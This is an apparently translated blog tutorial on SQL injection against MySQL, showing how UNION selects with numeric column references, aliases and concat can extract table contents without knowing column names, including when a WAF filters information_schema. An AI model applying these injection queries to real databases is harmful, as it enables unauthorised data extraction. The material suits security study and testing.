Detailed explanation of MySQL injection without knowing the column name

Preface

I feel like my mind is empty lately, as I have been digging holes just to make room for them. I think it would be better to return to the technology itself and make myself feel more comfortable. Okay, let’s not talk too much, let’s take a look at the detailed introduction.

premise

The following situation applies to MySQL < 5 version, or in MySQL >= 5 version [information_schema library exists], and the library name and table name have been obtained

① When only the table name can be obtained, but not the column name or only the column name without valid content can be obtained [such as id]

② When you want to obtain the structure of other tables, such as table names and column names, through the tables in the information_schema library, but this library is filtered out by WAF

In fact, I personally feel that this method is more practical for versions below 5, because for me, I usually give up when I encounter waf (I am really a bad programmer 23333)

solve

Normal query:

The following is a normal query of the user table content in the test database

select * from user; 

UNION query:

select 1,2,3,4 union select * from user; 

Query the corresponding column of numbers:

You can use numbers to correspond to columns for querying, such as 2 corresponds to the name column in the table.

select `2` from (select 1,2,3,4 union select * from user)a; 

Alias ​​replacement query:

When the backtick ` cannot be used, an alias can be used instead, such as setting the alias of 2 to b

select b from (select 1,2 as b,3,4 union select * from user)a; 

Multiple column merge query:

Same as above: If backticks cannot be used here, you can also use aliases instead

select concat(`2`,0x3a,`3`) from (select 1,2,3,4 union select * from user)a limit 1,1; 

Only for translation and organizing ideas

Original link: https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/

Summarize

The above is the full content of this article. I hope that the content of this article will have certain reference learning value for your study or work. Thank you for your support of 123WORDPRESS.COM.